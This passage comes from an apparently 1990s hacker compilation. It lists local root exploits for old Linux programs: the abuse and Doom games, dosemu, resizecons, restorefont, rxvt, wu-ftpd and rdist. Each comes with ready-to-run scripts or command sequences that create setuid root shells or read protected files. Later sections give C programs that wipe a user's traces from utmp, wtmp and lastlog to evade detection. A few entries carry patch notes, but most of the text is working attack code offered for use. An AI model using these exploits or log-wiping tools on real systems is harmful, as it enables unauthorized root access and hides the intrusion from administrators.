  5644.   *  <old_time>     = Time (seconds from epoch) that the current password
  5645.   *        was made the <old_password> (type long).
  5646.   *        0, never changed.ewromsinm
  5647.   *  <old_password> = Password (encrypted) saved for an aging <period> to
  5648.   *        prevent reuse during that period (type char [20]).
  5649.   *        "*******", no <old_password>.
  5650.   */
  5651.  
  5652.  /* number of tries to change an aged password */
  5653.  
  5654.  #define  CHANGE_TRIES 3
  5655.  
  5656.  /* program to execute to change passwords */
  5657.  
  5658.  #define  PASSWD_PROG "/bin/passwd"
  5659.  
  5660.  /* Name of the password aging exempt user names and max number of entires */
  5661.  
  5662.  #define  EXEMPTPW "/etc/exemptpw"
  5663.  #define MAX_EXEMPT 100
  5664.  
  5665.  /* Password criteria to enforce */
  5666.  
  5667.  #define BSD_CRIT 0    /* Normal BSD password criteria */
  5668.  #define STR_CRIT 1     /* Strong password criteria */
  5669.  #define MAX_CRIT 1
  5670.  #endif   elxsi
  5671.  #define NULL 0
  5672.  main()
  5673.  {
  5674.     struct passwd *p;
  5675.     int i;
  5676.     for (;1;) {;
  5677.       p=getpwent();
  5678.       if (p==NULL) return;
  5679.       printpw(p);
  5680.     }
  5681.  }
  5682.  
  5683.  printpw(a)
  5684.  struct SHADOWPW *a;
  5685.  {
  5686.     printf("%s:%s:%d:%d:%s:%s:%s\n",
  5687.        a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,
  5688.        a->pw_gecos,a->pw_dir,a->pw_shell);
  5689.  }
  5690.  
  5691.  /* SunOS 5.0        /etc/shadow */
  5692.  /* SunOS4.1+c2     /etc/security/passwd.adjunct */
  5693.  
  5694. ------------ cut here
  5695.  
  5696. ..........................................................................
  5697. .                                                                        .
  5698. . 8. Abuse Root Exploit (linux game program)                             .
  5699. .                                                                        .
  5700. ..........................................................................
  5701.  
  5702. ---------- cut here
  5703.  
  5704. There is a security hole in RedHat 2.1, which installs the game abuse,
  5705. /usr/lib/games/abuse/abuse.console suid root.  The abuse.console program
  5706. loads its files without absolute path names, assuming the user is running
  5707. abuse from the /usr/lib/games/abuse directory.  One of these files in the
  5708. undrv program, which abuse executes as root.  If the user is not in the
  5709. abuse directory when running this, an arbitrary program can be substituted
  5710. for undrv, allowing the user to execute arbitrary commands as root. 
  5711.    If abuse.console needs to be run by users other than root at the console,
  5712. provisions need to be made in the code to not execute or load any files
  5713. as root.
  5714.  
  5715.                    Program: /usr/lib/games/abuse/abuse.console suid root
  5716. Affected Operating Systems: Red Hat 2.1 linux distribution
  5717.               Requirements: account on system
  5718.                      Patch: chmod -s /usr/lib/games/abuse/abuse.console
  5719.        Security Compromise: root
  5720.                     Author: Dave M. (davem@cmu.edu)
  5721.                   Synopsis: abuse.console runs undrv without an absolute
  5722.                             pathname while executing as root, allowing
  5723.                             a user to substitute the real undrv with 
  5724.                             an arbitrary program.
  5725.  
  5726. Exploit:
  5727. #!/bin/sh
  5728. #
  5729. # abuser.sh
  5730. # exploits a security hole in abuse to create
  5731. # a suid root shell /tmp/abuser on a linux
  5732. # Red Hat 2.1 system with the games package 
  5733. # installed.
  5734. #
  5735. # For release 2/2/96 - 1 drink credit please.
  5736. #
  5737. # by Dave M. (davem@cmu.edu)
  5738. #
  5739. echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
  5740. echo ================ Checking system vulnerability
  5741. if test -u /usr/lib/games/abuse/abuse.console
  5742. then
  5743. echo ++++++++++++++++ System appears vulnerable.
  5744. cd /tmp
  5745. cat << _EOF_ > /tmp/undrv
  5746. #!/bin/sh
  5747. /bin/cp /bin/sh /tmp/abuser
  5748. /bin/chmod 4777 /tmp/abuser
  5749. _EOF_
  5750. cat << _EOF_ >> /tmp/the_wall
  5751. so ya thought ya might like to go to the show
  5752. to feel the warm thrill of confusion that space cadet glow
  5753. tell me is something eluding you sunshine?
  5754. is this not what you expected to see?
  5755. if you wanna find out what's behind these cold eyes
  5756. you'll just have to claw your way through this disguise
  5757. _EOF_
  5758. chmod +x /tmp/undrv
  5759. PATH=/tmp
  5760. echo ================ Executing Abuse
  5761. /usr/lib/games/abuse/abuse.console
  5762. /bin/rm /tmp/undrv
  5763. /bin/rm /tmp/the_wall
  5764. if test -u /tmp/abuser
  5765. then
  5766. echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
  5767. else
  5768. echo ---------------- Exploit failed
  5769. fi
  5770. else
  5771. echo ---------------- This machine does not appear to be vulnerable.
  5772. fi
  5773. ----------- cut here
  5774.  
  5775. ..........................................................................
  5776. .                                                                        .
  5777. . 9. Doom (game) root exploit - makes suid root shell                    .
  5778. .                                                                        .
  5779. ..........................................................................
  5780.  
  5781.  
  5782. ----------- Start reading
  5783. From bo@ebony.iaehv.nl Tue Dec 17 18:53:18 1996
  5784. Date: Tue, 17 Dec 1996 10:18:24 +0100
  5785. From: Bo <bo@ebony.iaehv.nl>
  5786. To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
  5787. Subject: Re: Linux: killmouse/doom
  5788.  
  5789. > From: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
  5790. > Subject:      Re: Linux: exploit for killmouse.
  5791. >
  5792. > Which reminds me, there's a bigger hole in Doom.  It doesn't drop its
  5793. > root permissions soon enough!  The user is allowed to set a sound server
  5794. > in his/her .doomrc.  Normally, this is set to "sndserver".  Howver, this
  5795. > can be set to *any* program, and that program runs as root!!
  5796.  
  5797. Yes,  very true. And just in case anybody collects these scripts, here's
  5798. the obvious one:
  5799.  
  5800. ------------ CUT HERE --------------
  5801. #!/bin/sh
  5802. # Tue Dec 17 10:02:20 MET 1996 Bo
  5803. echo 'sndserver "/tmp/sndserver"' > .doomrc
  5804. cat > /tmp/sndserver.c << EOF
  5805. #include <stdio.h>
  5806. #include <unistd.h>
  5807. main() {
  5808.         if (fork()) while (getc(stdin));
  5809.         else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
  5810.                 /* or whatever you like to do */
  5811. }
  5812. EOF
  5813. gcc /tmp/sndserver.c -o /tmp/sndserver
  5814.  
  5815. ------------ CUT HERE --------------
  5816.  
  5817. The  fork()  is  just so that doom runs on nicely without locking up the
  5818. keyboard  and  sndserver  gobbles  up all the sound data send to it. Run
  5819. the script, start sdoom, quit the normal way, and execute /tmp/sh.
  5820.  
  5821. Thanks for pointing it out, Joe.
  5822.  
  5823. Regards,
  5824.                 Bo.
  5825.  
  5826. --
  5827.                 "Heisenberg may have been here".
  5828.  
  5829. --------------- end of read
  5830.  
  5831. ..........................................................................
  5832. .                                                                        .
  5833. . 10. dosmenu suid root exploit                                          .
  5834. .                                                                        .
  5835. ..........................................................................
  5836.  
  5837.  
  5838. --------- read
  5839.  
  5840. In Debian 1.1, the optional DOSEMU package installs /usr/sbin/dos
  5841. setuid root.  This is a serious security hole which can be exploited
  5842. to gain access to any file on the system.
  5843.  
  5844. Package: dosemu
  5845. Version: 0.64.0.2-9
  5846.  
  5847. ------- start of cut text --------------
  5848.  
  5849. $ cat /etc/debian_version 
  5850. 1.1
  5851. $ id
  5852. uid=xxxx(quinlan) gid=xxxx(quinlan) groups=xxxx(quinlan),20(dialout),24(cdrom)
  5853. [quinlan:~]$ ls -al /usr/bin/dos
  5854. -rwsr-xr-x   1 root     root       569576 Oct 24 00:05 /usr/bin/dos
  5855. $ ls -al /root/foo
  5856. -rw-------   1 root     root         1117 Nov 13 23:10 /root/foo
  5857. $ dos -F /root/foo
  5858. [ Prints /root/foo, which is not readable by user `quinlan'. ]
  5859.  
  5860. ------- Cut here
  5861.  
  5862. I expect there may be other holes in dosemu other than this one that
  5863. can be exploited if it is installed setuid root.  It took about 60
  5864. seconds to find this hole once I realized /usr/bin/dos was setuid
  5865. root.
  5866.  
  5867. Dan
  5868.  
  5869. Note: This security hole can be corrected by removing the suid bit from
  5870. /usr/bin/dos:
  5871. ----------------------------
  5872. $ chmod u-s /usr/bin/dos
  5873. ----------------------------
  5874.  
  5875. Jonathan
  5876.  
  5877. ----------- end of read
  5878.  
  5879. ..........................................................................
  5880. .                                                                        .
  5881. . 11. Doom root killmouse exploit                                        .
  5882. .                                                                        .
  5883. ..........................................................................
  5884.  
  5885. System:
  5886. Probably  Linux  specific.  Slackware  3.0 (installs Linux 1.2.13) which
  5887. have  gpm  utility  and/or  the  Doom  package installed are vulnerable.
  5888. Other distributions might be too.
  5889.  
  5890. Impact:
  5891. Local users can acquire root status.
  5892.  
  5893. Background:
  5894. The  problem  is  the  killmouse/startmouse command that is part of Doom
  5895. package  on  Linux  systems.  It  is  actually a C-wrapper that runs two
  5896. scripts  (killmouse.sh/startmouse.sh). It runs suid root.
  5897.  
  5898. Problem:
  5899. I would try to describe the problem but I can't stop laughing.
  5900.  
  5901. Exploit:
  5902. This  can  be  exploited  in  a few similar ways. Here's just one. Let's
  5903. assume  the  gpm  utility is not running. We can't start it up ourselves
  5904. as gpm is only to be run by root. So we'll use startmouse to fire it up:
  5905.  
  5906. $ touch /tmp/gpmkilled
  5907. $ /usr/games/doom/startmouse
  5908.  
  5909. ps -aux | grep gpm
  5910. bo        1436  0.0  2.0   40  312 v03 R    16:33   0:00 grep gpm
  5911. root      1407  0.0  2.4   42  368  ?  S    16:24   0:00 /usr/bin/gpm t ms
  5912.  
  5913. Fine,  it's  running.  Now  we'll use killmouse to kill the process, but
  5914. first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:
  5915.  
  5916. $ umask 0
  5917. $ ln -s /root/.rhosts /tmp/gpmkilled
  5918. $ /usr/games/doom/killmouse
  5919.  1407  ?  S     0:00 gpm t ms
  5920.  
  5921. $ ls -l /root/.rhosts
  5922. -rw-rw-rw-   1 root     users           0 Dec 13 16:44 /root/.rhosts
  5923.  
  5924. $ echo localhost bo > /root/.rhosts
  5925. $ rsh -l root localhost sh -i
  5926. bash#
  5927.  
  5928. Bingo.  On  some  systems gpm might not be started in /etc/rc.d/rc.local
  5929. so  the  startmouse  script will fail. But gpm might be running already.
  5930. If  neither of these conditions are met, note that startmouse.sh creates
  5931. /tmp/gpmscript  and runs it in a shell. There's a window of time between
  5932. creating  the  script and executing it, so we have a nice race condition
  5933. here; it can be replaced with anything you like prior to execution.
  5934.  
  5935. Solution:
  5936. Remove  setuid  bits  of  killmouse/startmouse.  Better yet - nuke them.
  5937. While your at it, nuke Doom too - it's a stupid game anyway :-)
  5938.  
  5939. Best regards,
  5940.                 Bo (bo@ebony.iaehv.nl)
  5941.  
  5942.  
  5943. killmouse exploit
  5944. ------------------ cut here
  5945.  
  5946. /usr/games/doom/startmouse.sh:
  5947. #!/bin/sh
  5948. if [ -r /tmp/gpmkilled ]; then
  5949.   /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
  5950.   /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
  5951. fi
  5952.  
  5953. /usr/games/doom/killmouse.sh:
  5954. #!/bin/sh
  5955. if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
  5956.   GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
  5957. fi
  5958.  
  5959. ----------- cut here
  5960.  
  5961. ..........................................................................
  5962. .                                                                        .
  5963. . 12. Root exploit for resize icons                                      .
  5964. .                                                                        .
  5965. ..........................................................................
  5966.  
  5967. There is a security hole in RedHat 2.1, which installs the program
  5968. /usr/bin/resizecons suid root.  The resizecons program allows a user
  5969. to change the videmode of the console.  During this process, it runs
  5970. the program restoretextmode without an absolute pathname, assuming the
  5971. correct version will be found in the path, while running with root
  5972. privileges.  It then executes setfont in the same manner.  By setting
  5973. the path to find a rogue restoretextmode, a user can execute an arbitrary
  5974. program as root.
  5975.  
  5976. As a more amusing aside, the file /tmp/selection.pid is read and the
  5977. pid contained within is sent a SIGWINCH, allowing a user on the system
  5978. to force a redraw of the screen to an arbitrary process (that handles 
  5979. SIGWINCH calls) on the machine. 
  5980.  
  5981. If /usr/bin/resizecons needs to be run by users other than root at the
  5982. console, provisions need to be made in the code to execute the outside
  5983. utilities with absolute pathnames, and to check access rights on files
  5984. before opening.
  5985.  
  5986.                    Program: /usr/bin/resizecons
  5987. Affected Operating Systems: Red Hat 2.1 linux distribution
  5988.               Requirements: account on system
  5989.            Temporary Patch: chmod -s /usr/bin/resizecons
  5990.        Security Compromise: root
  5991.                     Author: Dave M. (davem@cmu.edu)
  5992.                   Synopsis: resizecons runs restoretextmode without an
  5993.                             absolute pathname while executing as root,
  5994.                             allowing a user to substitute the real
  5995.                             program with arbitrary commands.
  5996.  
  5997.  
  5998. ----------cut here
  5999. wozzeck.sh:
  6000. #!/bin/sh
  6001. #
  6002. # wozzeck.sh
  6003. # exploits a security hole in /usr/bin/resizecons 
  6004. # to create a suid root shell in /tmp/wozz on a 
  6005. # linux Red Hat 2.1 system.
  6006. #
  6007. # by Dave M. (davem@cmu.edu)
  6008. echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
  6009. echo ================ Checking system vulnerability
  6010. if test -u /usr/bin/resizecons
  6011. then
  6012. echo ++++++++++++++++ System appears vulnerable.
  6013. cd /tmp
  6014. cat << _EOF_ > /tmp/313x37
  6015. This exploit is dedicated to 
  6016. Wozz.  Use it with care.
  6017. _EOF_
  6018. cat << _EOF_ > /tmp/restoretextmode
  6019. #!/bin/sh
  6020. /bin/cp /bin/sh /tmp/wozz
  6021. /bin/chmod 4777 /tmp/wozz
  6022. _EOF_
  6023. /bin/chmod +x /tmp/restoretextmode
  6024. PATH=/tmp
  6025. echo ================ Executing resizecons
  6026. /usr/bin/resizecons 313x37
  6027. /bin/rm /tmp/restoretextmode
  6028. /bin/rm /tmp/313x37
  6029. if test -u /tmp/wozz
  6030. then
  6031. echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
  6032. else
  6033. echo ---------------- Exploit failed
  6034. fi
  6035. else
  6036. echo ---------------- This machine does not appear to be vulnerable.
  6037. fi
  6038.  
  6039. -------------- cut here
  6040.  
  6041. ..........................................................................
  6042. .                                                                        .
  6043. . 13. Root console exploit for restorefont                               .
  6044. .                                                                        .
  6045. ..........................................................................
  6046.  
  6047. Linux 'restorefont' Security Holes
  6048. by FEH Staff
  6049.  
  6050. Linux's svgalib utilities, required to be suid root, have a problem in that
  6051. they do not revoke suid permissions before reading a file.  This is exploited
  6052. in the restorefont utility, but similar bugs exist in other svgalib utilities.
  6053. The restorefont utility serves two functions.  First, it will read a font from
  6054. a file and write it to the console as the font.  Second, it will read a font
  6055. from the console and write it out to a file.  Luckily, the specific bug
  6056. in restorefont can only be exploited if someone is at the console, reducing
  6057. its overall impact on the security of the system as a whole.
  6058.  
  6059. In writing the utilities, the authors are cognizant of the fact that when
  6060. writing out the font, suid permissions must first be given up; it is in fact
  6061. commented as such in the code.  However, when reading in a font, the program
  6062. is still running with full suid root permissions.  This allows us to read in
  6063. any file for the font that root could access (basically, anything).
  6064.  
  6065. The applicable code to read in the file is shown below:
  6066.  
  6067. #define FONT_SIZE 8192
  6068. unsigned char font[FONT_SIZE];
  6069.  
  6070.     if (argv[1][1] == 'r') {
  6071.         FILE *f;
  6072.         f = fopen(argv[2], "rb");
  6073.         if (f == NULL) {
  6074.             error:
  6075.             perror("restorefont");
  6076.             exit(1);
  6077.         }
  6078.         if(1!=fread(font, FONT_SIZE, 1, f))
  6079.             {
  6080.             if(errno)
  6081.                 goto error;
  6082.             puts("restorefont: input file corrupted.");
  6083.             exit(1);
  6084.             }
  6085.         fclose(f);
  6086.  
  6087. We can see from this that the file to be read in has to be at least 8k,
  6088. as if it is not, the program will produce an error and exit.  If the file
  6089. is at least 8k, the first 8k are read into the buffer, and the program 
  6090. proceeds to set whatever the contents of the file are to the font:
  6091.     vga_disabledriverreport();
  6092.     vga_setchipset(VGA);        /* avoid SVGA detection */
  6093.     vga_init();
  6094.     vga_setmode(G640x350x16);
  6095.     vga_puttextfont(font);
  6096.     vga_setmode(TEXT);
  6097.  
  6098. At this point, the console will now look quite unreadable if you are
  6099. reading something other than a font from that file.  But, the data that
  6100. is put into the font is left untouched and is readable using the -w option
  6101. of restorefont.  We then read the font back from video memory to a new file,
  6102. and our job is complete, we have read the first 8k of a file we shouldn't
  6103. have had access to.  To prevent detection of having run this, we probably
  6104. shouldn't leave an unreadable font on the screen, so we save and then restore
  6105. the original font before reading from the file.
  6106. The complete exploit is shown below:
  6107.  
  6108.                    Program: restorefont, a svgalib utility
  6109. Affected Operating Systems: linux
  6110.               Requirements: logged in at console
  6111.        Security Compromise: user can read first 8k of any file of at least
  6112.                             8k in size on local filesystems
  6113.                   Synopsis: restorefont reads a font file while suid root,
  6114.                             writing it to video memory as the current vga
  6115.                             font; anyone at console can read the current
  6116.                             font to a file, allowing you to use video memory
  6117.                             as an 8k file buffer.
  6118.  
  6119. -------------
  6120. rfbug.sh:
  6121. --------------------cut here
  6122. #!/bin/sh
  6123. restorefont -w /tmp/deffont.tmp
  6124. restorefont -r $1
  6125. restorefont -w $2
  6126. restorefont -r /tmp/deffont.tmp
  6127. rm -f /tmp/deffont.tmp
  6128. -----------------------------------cut here
  6129.  
  6130. ..........................................................................
  6131. .                                                                        .
  6132. . 14. Root rxvt X server exploit                                         .
  6133. .                                                                        .
  6134. ..........................................................................
  6135.  
  6136. Program: rxvt
  6137. Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
  6138.                             rxvt suid root (and compiled with PRINT_PIPE)
  6139.               Requirements: account on system, X server
  6140.            Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
  6141.        Security Compromise: root
  6142.                     Author: Dave M. (davem@cmu.edu)
  6143.                   Synopsis: rxvt fails to give up root privileges before
  6144.                             opening a pipe to a program that can be specified
  6145.                             by the user.
  6146.  
  6147.  
  6148. Exploit:
  6149. 1.  Set DISPLAY environment variable if necessary so you can use x clients.
  6150. 2.  In user shell:
  6151.     $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
  6152.     $ chmod +x /tmp/rxbug
  6153.     $ rxvt -print-pipe /tmp/rxbug
  6154. 3.  In rxvt xclient:
  6155.     $ cat
  6156.       ESC[5i
  6157.       ESC[4i
  6158.     (The client will close at this point with a broken pipe)
  6159. 4.  $ /tmp/rxsh
  6160.     # whoami
  6161.     root
  6162.     #
  6163.  
  6164. ..........................................................................
  6165. .                                                                        .
  6166. .15. Root wuftpd exploit                                                 .
  6167. ..........................................................................
  6168.  
  6169. The following is gleaned from the BugTraq mailing list:
  6170. -------------------------------------------------------
  6171. Since Bugtraq is exceptionally quiet lately, I though I should make it
  6172. come alive again with this discussion of the bug that was reported in
  6173. the wu.ftpd that comes with some Slackware distributions of Linux.
  6174. The report was just before Bugtraq went down for a long time, but
  6175. I've found the bug still to be present on all the Linux machines that
  6176. I have access to. So maybe it needs to be brought a little more in
  6177. the open. Here we go:
  6178.  
  6179. ObBug: - Short description of the bug
  6180.  
  6181. It involves wu.ftpd being misconfigured at compile time and allowing
  6182. SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users
  6183. this is ~ftp/bin). Now if in this /bin resides a program that gives
  6184. access to executables outside /bin, but in the users reach (such as
  6185. /bin/bash that gives access to the user's homedir), this opens up
  6186. a root vulnerability. This should have been set to /bin/ftp-exec and
  6187. which be set by the _PATH_EXECPATH variable in src/pathnames.h before
  6188. compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the
  6189. net has this securely set as default value.
  6190.  
  6191. - How to check ?
  6192.  
  6193. $ ftp -n localhost
  6194. user: <userid>
  6195. password: <passwd>
  6196. ftp> quote site exec bash -c id
  6197.  
  6198. If vulnerable it gives here: uid=0, gid=0, euid=<yourid>, egid=<your-gids>
  6199.  
  6200. Of course, bash should not be available at all
  6201.  
  6202. - How to exploit (in case your sysadmin or you think the above is not
  6203.   a problem)
  6204.  
  6205. go to your homedir and make a program: duh.c (or whatever)
  6206.  
  6207. main() {
  6208.    seteuid(0);
  6209.    setegid(0);
  6210.    system("/bin/cp /bin/sh ./sh");
  6211.    system("/bin/chmod 6755 ./sh");
  6212. }
  6213.  
  6214. $ make duh
  6215. $ ftp -n localhost (and login)
  6216. user: <userid>
  6217. password: <passwd>
  6218. ftp> quote site exec bash -c duh
  6219. ftp> quit
  6220.  
  6221. $ ./sh
  6222.  
  6223. bash#
  6224.  
  6225. (voila, QED)
  6226.  
  6227. - How to fix?
  6228.  
  6229. Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive
  6230. doesn't compile on linux) and compile it; you might want to define the
  6231. _PATH_PIDNAMES and _PATH_XFERLOG to other values there...(/usr/adm/ftp.pids-%s
  6232. and /usr/adm/xferlog for example). If you cannot find that I can email the
  6233. source to you,...if you trust the source I took somewhere unmodified and
  6234. if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too.
  6235. I can remember that I got it that way.
  6236.  
  6237. $) Henri Karrenbeld
  6238. -----------------------------------------------------------------------------
  6239. Hardware, n.:
  6240.         The parts of a computer system that can be kicked.
  6241. -----------------------------------------------------------------------------
  6242.  
  6243. ..........................................................................
  6244. .                                                                        .
  6245. . 16. A shell script called gimme, used to read any system file          .
  6246. ..........................................................................
  6247.  
  6248. ----------------cut here
  6249. #! /bin/sh
  6250. # GIMME - "gimme' a file"
  6251. # Demonstrate rdist's ability to give me permission to access anything.
  6252. #
  6253. # gimme <pathname> [<permission> [<directory>]]
  6254. #       <pathname> is the target file.
  6255. #       <permission> is the octal mode to which the file access permission
  6256. #               should be set.  Note that this may not be effective unless
  6257. #               either the SUID (4000) or SGID (2000) bits are also requested.
  6258. #       <directory> is the target directory for rdist to use if a hard
  6259. #               link is desired.  Note that the user must have permission
  6260. #               to create this directory, it must be on the same filesystem
  6261. #               as the target file, and the target file must not be a
  6262. #               directory.  This option is necessary to change the ownership
  6263. #               of the target if chown() of a symbolic link modifies the
  6264. #               link itself, and not the file it refers to.
  6265. #
  6266.  
  6267. dirname=gimme$$
  6268. deftemp=/tmp
  6269. defperm=6777
  6270.  
  6271. if [ $1x = x ]; then
  6272.         echo "Usage: $0 <pathname> [<permission> [<directory>]]" >&2
  6273.         exit 1
  6274. fi
  6275.  
  6276. if [ $2x != x ]; then
  6277.         perm=$2
  6278. else
  6279.         perm=$defperm
  6280. fi
  6281.  
  6282. if [ $3x != x ]; then
  6283.         link="ln"
  6284.         temp=$3/$dirname
  6285.         target=$1
  6286. else
  6287.         link="ln -s"
  6288.         temp=$deftemp/$dirname
  6289.         case $1 in
  6290.         /*)
  6291.                 target=$1
  6292.                 ;;
  6293.         *)
  6294.                 target=`pwd`/$1
  6295.                 ;;
  6296.         esac
  6297. fi
  6298.  
  6299. trap "rm -fr $temp; exit 1"  1 2 15
  6300. umask 66
  6301. mkdir $temp; if [ $? != 0 ]; then
  6302.         exit 1
  6303. fi
  6304.  
  6305. set `whoami` $LOGNAME
  6306. user=$1
  6307. set daemon `groups`
  6308. while [ $# != 1 ]; do
  6309.         shift
  6310. done
  6311. group=$1
  6312.  
  6313. (
  6314.         echo "t$temp/something"
  6315.         echo "R0 $perm 1 0 $user $group "
  6316.  
  6317.         while [ ! -f $temp/rdist* ]; do
  6318.                 sleep 1
  6319.         done
  6320.  
  6321.         set $temp/rdist*
  6322.         rm -f $1
  6323.         if $link $target $1 >&2; then
  6324.                 echo "" | dd bs=3 conv=sync 2>/dev/null
  6325.                 echo ""
  6326.  
  6327.                 echo 0 > $temp/status
  6328.         else
  6329.                 echo 1 > $temp/status
  6330.         fi
  6331.  
  6332.         exit
  6333. ) | rdist -Server
  6334.  
  6335. status=`cat $temp/status`
  6336. rm -fr $temp
  6337. exit $status
  6338. -----------------------------cut here
  6339.  
  6340.  
  6341.  
  6342. *********************************************
  6343. * Appendix IV - Other UNIX system utilities *
  6344. *********************************************
  6345.  
  6346.  
  6347. ..........................................................................
  6348. .                                                                        .
  6349. . 1. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX  .
  6350. ..........................................................................
  6351.  
  6352.  
  6353. ------------------ cut here
  6354.  
  6355. /* UNIX Cloak v1.0 (alpha)  Written by: Wintermute of -Resist- */
  6356. /* This file totally wipes all presence of you on a UNIX system*/
  6357. /* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
  6358. /* is compatible..  This file is for information purposes ONLY!*/
  6359.  
  6360. /*--> Begin source...    */
  6361. #include <fcntl.h>
  6362. #include <utmp.h>
  6363. #include <sys/types.h>
  6364. #include <unistd.h>
  6365. #include <lastlog.h>
  6366.  
  6367. main(argc, argv)
  6368.     int     argc;
  6369.     char    *argv[];
  6370. {
  6371.     char    *name;
  6372.     struct utmp u;
  6373.     struct lastlog l;
  6374.     int     fd;
  6375.     int     i = 0;
  6376.     int     done = 0;
  6377.     int     size;
  6378.  
  6379.     if (argc != 1) {
  6380.          if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
  6381.          printf("You are now cloaked\n");
  6382.          goto start;
  6383.                                                            }
  6384.          else {
  6385.           printf("close successful\n");
  6386.           exit(0);
  6387.           }
  6388.            }
  6389.     else {
  6390.      printf("usage: close [file to close]\n");
  6391.      exit(1);
  6392.      }
  6393. start:
  6394.     name = (char *)(ttyname(0)+5);
  6395.     size = sizeof(struct utmp);
  6396.  
  6397.     fd = open("/etc/utmp", O_RDWR);
  6398.     if (fd < 0)
  6399.     perror("/etc/utmp");
  6400.     else {
  6401.     while ((read(fd, &u, size) == size) && !done) {
  6402.         if (!strcmp(u.ut_line, name)) {
  6403.         done = 1;
  6404.         memset(&u, 0, size);
  6405.         lseek(fd, -1*size, SEEK_CUR);
  6406.         write(fd, &u, size);
  6407.         close(fd);
  6408.         }
  6409.     }
  6410.     }
  6411.  
  6412.  
  6413.     size = sizeof(struct lastlog);
  6414.     fd = open("/var/adm/lastlog", O_RDWR);
  6415.     if (fd < 0)
  6416.     perror("/var/adm/lastlog");
  6417.     else {
  6418.     lseek(fd, size*getuid(), SEEK_SET);
  6419.     read(fd, &l, size);
  6420.     l.ll_time = 0;
  6421.     strncpy(l.ll_line, "ttyq2 ", 5);
  6422.     gethostname(l.ll_host, 16);
  6423.     lseek(fd, size*getuid(), SEEK_SET);
  6424.     close(fd);
  6425.     }
  6426. }
  6427. ---------------cut here
  6428.  
  6429. .............................................................................
  6430. .                                                                           .
  6431. . 2. invisible.c  Makes you invisible, and works on some SunOS without root .
  6432. .............................................................................
  6433.  
  6434.  
  6435. ----------- cut here
  6436. /* invisible.c - a quick hack courtesy of the rogue */
  6437. /* erases your presence when root, or partially erases when on a sun and not root */
  6438. /* peace, dudes */
  6439.  
  6440.  
  6441. #include <fcntl.h>
  6442. #include <utmp.h>
  6443. #include <sys/types.h>
  6444. #include <unistd.h>
  6445. #include <lastlog.h>
  6446.  
  6447. main(argc, argv)
  6448.     int     argc;
  6449.     char    *argv[];
  6450. {
  6451.     char    *name;
  6452.     struct utmp u;
  6453.     struct lastlog l;
  6454.     int     fd;
  6455.     int     i = 0;
  6456.     int     done = 0;
  6457.     int     size;
  6458.  
  6459.     name = (char *)(ttyname(0)+5);
  6460.     size = sizeof(struct utmp);
  6461.     
  6462.     fd = open("/etc/utmp", O_RDWR);
  6463.     if (fd < 0)
  6464.     perror("/etc/utmp");
  6465.     else {
  6466.     while ((read(fd, &u, size) == size) && !done) {
  6467.         if (!strcmp(u.ut_line, name)) {
  6468.         done = 1;
  6469.         memset(&u, 0, size);
  6470.         lseek(fd, -1*size, SEEK_CUR);
  6471.         write(fd, &u, size);
  6472.         close(fd);
  6473.         }
  6474.     }
  6475.     }
  6476.     memset(&u, 0, size);
  6477.     fd = open("/var/adm/wtmp", O_RDWR | O_TRUNC);
  6478.     if (fd < 0)
  6479.     perror("/var/adm/wtmp");
  6480.     else {
  6481.     u.ut_time = 0;
  6482.     strcpy(u.ut_line, "~");
  6483.     strcpy(u.ut_name, "shutdown");
  6484.     write(fd, &u, size);
  6485.     strcpy(u.ut_name, "reboot");
  6486.     write(fd, &u, size);
  6487.     close(fd);
  6488.     }
  6489.  
  6490.  
  6491.     size = sizeof(struct lastlog);
  6492.     fd = open("/var/adm/lastlog", O_RDWR);
  6493.     if (fd < 0)
  6494.     perror("/var/adm/lastlog");
  6495.     else {
  6496.     lseek(fd, size*getuid(), SEEK_SET);
  6497.     read(fd, &l, size);
  6498.     l.ll_time = 0;
  6499.     strncpy(l.ll_line, "ttyq2 ", 5);
  6500.     gethostname(l.ll_host, 16);
  6501.     lseek(fd, size*getuid(), SEEK_SET);
  6502.     write(fd, &l, size);
  6503.     close(fd);
  6504.     }
  6505.     
  6506. }
  6507. ----------- cut here
  6508.  
  6509. ..........................................................................
  6510. .                                                                        .
  6511. . 3. SySV Program that makes you invisible                               .
  6512. ..........................................................................
  6513.  
  6514.  
  6515. --------- cut here
  6516.  
  6517. /* MME - MakeME, Version 1.00 for SySV / Source Compatible machines   
  6518.          MME will allow you to remove yerself from the UTMP file, change
  6519.          what name appears for you in UTMP, or change what TTY you appear
  6520.          to be on.
  6521.  
  6522. If you modify this program or incorporate some of these routines into
  6523. another program, please somewhere in the program tell where you got
  6524. them from.. namely, put in some credits to me & This program , so
  6525. you don't "playgerize".  It makes me mad when someone modifies someone
  6526. else's work then pawns it off as their own original piece.  The credits
  6527. can even be in a comment somewhere in the source instead of visual to
  6528. the user. 
  6529.  
  6530. syntax:
  6531. mme
  6532. mme login_name
  6533. mme login_name new_tty
  6534.  
  6535. in order to change tty name, you must first supply a login name
  6536. then a ttyname.
  6537.  
  6538. You MUST have write perm's to /etc/utmp to modify the main utmp file.
  6539. */
  6540.  
  6541. #include <stdio.h>
  6542. #include <fcntl.h>
  6543. #include <sys/types.h>
  6544. #include <utmp.h>
  6545. #include <sys/stat.h>
  6546.  
